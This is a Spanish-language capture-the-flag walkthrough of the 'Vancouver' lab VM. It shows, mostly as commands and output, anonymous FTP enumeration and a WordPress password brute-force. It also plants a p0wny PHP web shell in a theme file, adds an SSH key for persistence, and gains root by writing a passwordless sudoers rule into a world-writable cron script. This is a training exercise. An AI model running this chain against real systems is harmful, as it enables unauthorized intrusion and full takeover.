vancouver - danielcastropalomares/security GitHub Wiki
Con un primer escaneo vemos que tiene abierto ftp, ssh y http:
root@kali:~# nmap -p- 172.31.255.120
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-18 23:07 CET
Nmap scan report for 172.31.255.120
Host is up (0.000076s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.62 seconds
root@kali:/tmp# nmap -A 172.31.255.120
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-18 23:07 CET
Nmap scan report for 172.31.255.120
Host is up (0.00067s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.31.255.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 172.31.255.120
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds
Por FTP vemos un fichero users.txt.bk:
root@kali:/tmp# ftp 172.31.255.120
Connected to 172.31.255.120.
220 (vsFTPd 2.3.5)
Name (172.31.255.120:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
226 Directory send OK.
ftp> dir public
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 31 Mar 03 2018 users.txt.bk
226 Directory send OK.
ftp>
Descargamos el fichero:
ftp> cd public
250 Directory successfully changed.
ftp> get users.txt.bk
local: users.txt.bk remote: users.txt.bk
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for users.txt.bk (31 bytes).
226 Transfer complete.
31 bytes received in 0.00 secs (7.0600 kB/s)
ftp>
El fichero parece ser que contiene unos usuarios:
root@kali:/tmp# cat users.txt.bk
abatchy
john
mai
anne
doomguy
Listamos los directorios activos del servidor:
[23:35:13] 200 - 19KB - /backup_wordpress/license.txt
[23:35:15] 200 - 7KB - /backup_wordpress/readme
[23:35:15] 200 - 7KB - /backup_wordpress/readme.html
[23:35:16] 301 - 0B - /backup_wordpress/index -> http://172.31.255.120/backup_wordpress/index/
[23:35:16] 301 - 0B - /backup_wordpress/index.php/login/ -> http://172.31.255.120/backup_wordpress/login/
[23:35:16] 301 - 0B - /backup_wordpress/index.php -> http://172.31.255.120/backup_wordpress/
[23:35:17] 301 - 336B - /backup_wordpress/wp-admin -> http://172.31.255.120/backup_wordpress/wp-admin/
[23:35:17] 301 - 338B - /backup_wordpress/wp-content -> http://172.31.255.120/backup_wordpress/wp-content/
[23:35:17] 200 - 69B - /backup_wordpress/wp-content/plugins/akismet/akismet.php
[23:35:17] 200 - 0B - /backup_wordpress/wp-content/
[23:35:17] 301 - 339B - /backup_wordpress/wp-includes -> http://172.31.255.120/backup_wordpress/wp-includes/
[23:35:17] 500 - 0B - /backup_wordpress/wp-includes/rss-functions.php
[23:35:17] 200 - 34KB - /backup_wordpress/wp-includes/
[23:35:22] 200 - 0B - /backup_wordpress/wp-config.php
[23:35:22] 200 - 2KB - /backup_wordpress/wp-login/
[23:35:22] 200 - 2KB - /backup_wordpress/wp-login.php
[23:35:22] 200 - 2KB - /backup_wordpress/wp-login
[23:35:22] 500 - 3KB - /backup_wordpress/wp-admin/setup-config.php
[23:35:22] 302 - 0B - /backup_wordpress/wp-admin/ -> /backup_wordpress/wp-login.php?redirect_to=http%3A%2F%2F172.31.255.120%2Fbackup_wordpress%2Fwp-admin%2F&reauth=1
[23:35:22] 200 - 1KB - /backup_wordpress/wp-admin/install.php
[23:35:22] 405 - 42B - /backup_wordpress/xmlrpc.php
En la pagina de login de wordpress, podemos enumerar los usuarios encontrados anteriormente. Con el usuario john y admin nos aparece el siguiente mensaje:
ERROR: The password field is empty.
Con nmap y bruteforce, encontramos el usuario con el diccionario de rockyou:
root@kali:/tmp# cat users100
john
root@kali:/tmp# nmap -p 80 --script http-wordpress-brute --script-args 'userdb=/tmp/users100,passdb=/tmp/rockyou.txt,http-wordpress-brute.uri=/backup_wordpress/wp-login.php,brute.firstonly=true' 172.31.255.120
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-18 23:53 CET
Nmap scan report for 172.31.255.120
Host is up (0.00043s latency).
PORT STATE SERVICE
80/tcp open http
| http-wordpress-brute:
| Accounts:
| john:enigma - Valid credentials
|_ Statistics: Performed 2519 guesses in 321 seconds, average tps: 8.4
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 336.35 seconds
Escaneamos el wordpress con wpscan y vemos que es una versión muy antigua:
root@kali:~# wpscan --url http://172.31.255.120/backup_wordpress
[+] WordPress version 4.5 identified (Insecure, released on 2016-04-12).
Ahora accederemos con las credenciales que hemos encontrado anteriormente y editamos el siguiente fichero para subir una shell php, en mi caso he utilizado la siguiente:
https://github.com/flozz/p0wny-shell
Appareance > Editor > 404.php
Una vez hemos editado el archivo, accederemos a la URL en cuestión:
http://172.31.255.120/backup_wordpress/wp-content/themes/twentysixteen/404.php
Una vez dentro, confirmamos el usuario y donde está su home:
p0wny@shell:…/www/.ssh# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
p0wny@shell:…/www/# cat /etc/passwd | grep www-data
www-data:x:33:33:www-data:/var/www:/bin/sh
Ahora vamos a copiar nuestra llave publica para conectarnos por SSH:
p0wny@shell:/var/www# mkdir .ssh
p0wny@shell:…/www/.ssh# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCbzg2USqeSVUbyUxDlMRa2q0Rdt0qTexnKC0uklMrjJRHLIAyII76fzKL0xHnD3QOWUMN3dDecINLt+zv77NvsCVP+IyFaEw9GGQyyOAsvi28xI7JC+LZRVK0JNSIF8+XagmBx8JeCkpeYcnNwoh1Rovoc149tbzMPPSfe6dOEgQ== root@kali" > authorized_keys
Ahora ya podemos acceder por SSH:
root@kali:/tmp# ssh -i test2 [email protected]
The authenticity of host '172.31.255.120 (172.31.255.120)' can't be established.
ECDSA key fingerprint is SHA256:FhT9tr50Ps28yBw38pBWN+YEx5wCU/d8o1Ih22W4fyQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.31.255.120' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)
* Documentation: https://help.ubuntu.com/
382 packages can be updated.
275 updates are security updates.
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ /bin/bash
www-data@bsides2018:~$
Buscamos los archivos que tengan SUID configurado y no encontramos nada interesante:
www-data@bsides2018:~$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ping
/bin/mount
/bin/su
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/bin/arping
/usr/bin/at
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/lppasswd
/usr/bin/sudoedit
/usr/bin/chsh
/usr/bin/X
/usr/bin/pkexec
/usr/sbin/uuidd
/usr/sbin/pppd
A nivel de cron vemos lo siguiente:
www-data@bsides2018:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root /usr/local/bin/cleanup
#
Localizamos el script cleanup y vemos que tiene permisos de escritura:
www-data@bsides2018:~$ cat /usr/local/bin/cleanup
#!/bin/sh
rm -rf /var/log/apache2/* # Clean those damn logs!!
www-data@bsides2018:~$ ls -liath /usr/local/bin/cleanup
37657 -rwxrwxrwx 1 root root 64 Mar 3 2018 /usr/local/bin/cleanup
Vamos a modificar el script para que no nos pida el password de sudo del usuario www-data:
www-data@bsides2018:~$ cat /usr/local/bin/cleanup
#!/bin/sh
rm -rf /var/log/apache2/* # Clean those damn logs!!
echo "www-data ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers.d/www-data
chmod 0440 /etc/sudoers.d/www-data
Ahora si volvemos a entrar por SSH:
root@kali:/tmp# ssh -i test2 [email protected]
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)
* Documentation: https://help.ubuntu.com/
382 packages can be updated.
275 updates are security updates.
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Dec 18 16:37:11 2018 from 172.31.255.129
$ /bin/bash
www-data@bsides2018:~$ sudo su
root@bsides2018:/var/www#
Ahora ya podemos llegar al directorio root y leer la flag:
root@bsides2018:~# cat flag.txt
Congratulations!
If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!
There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?
@abatchy17